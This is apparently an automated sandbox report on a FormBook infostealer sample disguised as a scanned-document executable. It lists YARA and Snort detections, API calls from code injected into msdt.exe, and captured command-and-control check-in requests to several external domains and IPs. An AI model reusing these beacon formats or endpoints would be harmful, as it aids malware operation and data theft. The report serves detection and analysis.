"0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04",

Multi AV Scanner detection for submitted file

Show sources

Source: SKM_C36821010708320.exe

ReversingLabs: Detection: 28%

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for sample

Show sources

Source: SKM_C36821010708320.exe

Joe Sandbox ML: detected

Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: SKM_C36821010708320.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: SKM_C36821010708320.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: msdt.pdbGCTL source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe, 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp, msdt.exe
Source:	Binary string: msdt.pdb source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	0_2_060CB410
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 4x nop then pop esi	2_2_004172D8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop esi	6_2_030172D8

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49749 -> 103.29.215.252:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49750 -> 52.128.23.153:80

Source: global traffic	HTTP traffic detected: GET /6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.o-tanemaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.idahofallsobituaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.bhscsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.sheilataman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.ehealthla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 52.128.23.153 52.128.23.153
Source: Joe Sandbox View	IP Address: 34.102.136.180 34.102.136.180

Source: Joe Sandbox View	ASN Name: WIIUS WIIUS
Source: Joe Sandbox View	ASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
Source: Joe Sandbox View	ASN Name: DOSARRESTUS DOSARRESTUS

Source: global traffic	HTTP traffic detected: GET /6bu2/?_FNlYB=UiUikuUm5Gnwa/RC8HfxmFUojYQ87eGtpmlzeqcBYMLKQcnADeoLPEL+PxRUrH62O+cU&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.o-tanemaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /6bu2/?_FNlYB=kQfR6oHqf1829R+dk89CbQkI6JsDf2kbL2dewoZCGSm5OfzNJ+nKnG9aqB78Y+EDmzvg&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.idahofallsobituaries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /6bu2/?_FNlYB=C+zDmV11Q+D9r33XVeqR5IBXFKX0BTJmu/S+z/bMoWLqgljoX+qokl8zdBgJjJlA7MT1&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.bhscsh.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /6bu2/?_FNlYB=JImKQCKfXzlBTYBvNEy/gJkFfNV1GdJ9tkN4E9b1C6xzootmnG8qxQeaBWCQRAMh80Yn&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.sheilataman.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /6bu2/?_FNlYB=94KbLiUgY8wWwYGUmiNR7bnZsaGPnSdzNXNbmna93NLOwX7qMp/QzDnFT9WUG3fulNFR&qRu=rTvtaraPvhs45 HTTP/1.1Host: www.ehealthla.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.o-tanemaki.com

Source: explorer.exe, 00000003.00000000.259665559.000000000F540000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.256347342.0000000008B46000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.567098302.0000000003000000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.568632673.0000000004BB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.272074038.00000000013A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.234017066.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.SKM_C36821010708320.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.SKM_C36821010708320.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_0041A050 NtClose,	2_2_0041A050
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_0041A100 NtAllocateVirtualMemory,	2_2_0041A100
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00419F20 NtCreateFile,	2_2_00419F20
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00419FD0 NtReadFile,	2_2_00419FD0
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_0041A0FA NtAllocateVirtualMemory,	2_2_0041A0FA
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009540 NtReadFile,LdrInitializeThunk,	6_2_05009540
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050095D0 NtClose,LdrInitializeThunk,	6_2_050095D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009710 NtQueryInformationToken,LdrInitializeThunk,	6_2_05009710
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009780 NtMapViewOfSection,LdrInitializeThunk,	6_2_05009780
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009FE0 NtCreateMutant,LdrInitializeThunk,	6_2_05009FE0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009650 NtQueryValueKey,LdrInitializeThunk,	6_2_05009650
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009660 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_05009660
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050096D0 NtCreateKey,LdrInitializeThunk,	6_2_050096D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050096E0 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_050096E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009910 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_05009910
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050099A0 NtCreateSection,LdrInitializeThunk,	6_2_050099A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009840 NtDelayExecution,LdrInitializeThunk,	6_2_05009840
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009860 NtQuerySystemInformation,LdrInitializeThunk,	6_2_05009860
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009A50 NtCreateFile,LdrInitializeThunk,	6_2_05009A50
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009520 NtWaitForSingleObject,	6_2_05009520
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0500AD30 NtSetContextThread,	6_2_0500AD30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009560 NtWriteFile,	6_2_05009560
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050095F0 NtQueryInformationFile,	6_2_050095F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0500A710 NtOpenProcessToken,	6_2_0500A710
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009730 NtQueryVirtualMemory,	6_2_05009730
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009760 NtOpenProcess,	6_2_05009760
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0500A770 NtOpenThread,	6_2_0500A770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009770 NtSetInformationFile,	6_2_05009770
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050097A0 NtUnmapViewOfSection,	6_2_050097A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009610 NtEnumerateValueKey,	6_2_05009610
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009670 NtQueryInformationProcess,	6_2_05009670
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009950 NtQueueApcThread,	6_2_05009950
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050099D0 NtCreateProcessEx,	6_2_050099D0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009820 NtEnumerateKey,	6_2_05009820
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0500B040 NtSuspendThread,	6_2_0500B040
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050098A0 NtWriteVirtualMemory,	6_2_050098A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050098F0 NtReadVirtualMemory,	6_2_050098F0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009B00 NtSetValueKey,	6_2_05009B00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0500A3B0 NtGetContextThread,	6_2_0500A3B0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009A00 NtProtectVirtualMemory,	6_2_05009A00
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009A10 NtQuerySection,	6_2_05009A10
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009A20 NtResumeThread,	6_2_05009A20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05009A80 NtOpenDirectoryObject,	6_2_05009A80
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0301A100 NtAllocateVirtualMemory,	6_2_0301A100
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0301A050 NtClose,	6_2_0301A050
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03019F20 NtCreateFile,	6_2_03019F20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03019FD0 NtReadFile,	6_2_03019FD0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0301A0FA NtAllocateVirtualMemory,	6_2_0301A0FA

Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 0_2_009D9013	0_2_009D9013
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 0_2_0524C62C	0_2_0524C62C
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 0_2_0524E8A0	0_2_0524E8A0
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 0_2_0524E890	0_2_0524E890
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 0_2_060C99A0	0_2_060C99A0
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 0_2_060C0D70	0_2_060C0D70
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 0_2_060C0D80	0_2_060C0D80
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 0_2_060C0B18	0_2_060C0B18
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 0_2_060C0B28	0_2_060C0B28
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00401030	2_2_00401030
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_0041D28D	2_2_0041D28D
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_0041E407	2_2_0041E407
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_0041D53D	2_2_0041D53D
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00402D90	2_2_00402D90
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00409E2B	2_2_00409E2B
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00409E30	2_2_00409E30
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00402FB0	2_2_00402FB0
Source: C:\Users\user\Desktop\SKM_C36821010708320.exe	Code function: 2_2_00B59013	2_2_00B59013
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05092D07	6_2_05092D07
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05091D55	6_2_05091D55
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050925DD	6_2_050925DD
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FD841F	6_2_04FD841F
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDD5E0	6_2_04FDD5E0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508D466	6_2_0508D466
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF2581	6_2_04FF2581
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FC0D20	6_2_04FC0D20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE6E30	6_2_04FE6E30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05091FF1	6_2_05091FF1
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508D616	6_2_0508D616
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05092EF7	6_2_05092EF7
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FF20A0	6_2_04FF20A0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FDB090	6_2_04FDB090
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05081002	6_2_05081002
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050920A8	6_2_050920A8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FE4120	6_2_04FE4120
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050928EC	6_2_050928EC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FCF900	6_2_04FCF900
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_05092B28	6_2_05092B28
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0508DBD2	6_2_0508DBD2
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_04FFEBB0	6_2_04FFEBB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_050922AE	6_2_050922AE
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0301D28D	6_2_0301D28D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03001030	6_2_03001030
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03002FB0	6_2_03002FB0
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03009E2B	6_2_03009E2B
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03009E30	6_2_03009E30
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_03002D90	6_2_03002D90
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_0301E407	6_2_0301E407

Source: C:\Windows\SysWOW64\msdt.exe

Code function: String function: 04FCB150 appears 35 times

Source: SKM_C36821010708320.exe, 00000000.00000002.238052275.0000000006050000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamePositiveSign.dll< vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe, 00000000.00000000.216347265.0000000000A92000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe, 00000000.00000002.233265389.0000000002DC1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameSoapName.dll2 vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe, 00000002.00000000.230956986.0000000000C12000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe, 00000002.00000002.272414307.000000000179F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe, 00000002.00000002.272752865.00000000032E0000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemsdt.exej% vs SKM_C36821010708320.exe
Source: SKM_C36821010708320.exe	Binary or memory string: OriginalFilenameServerObjectTerminatorSink.exe@ vs SKM_C36821010708320.exe

Source: SKM_C36821010708320.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.272158049.00000000015E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.271759411.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.568720643.0000000004C00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
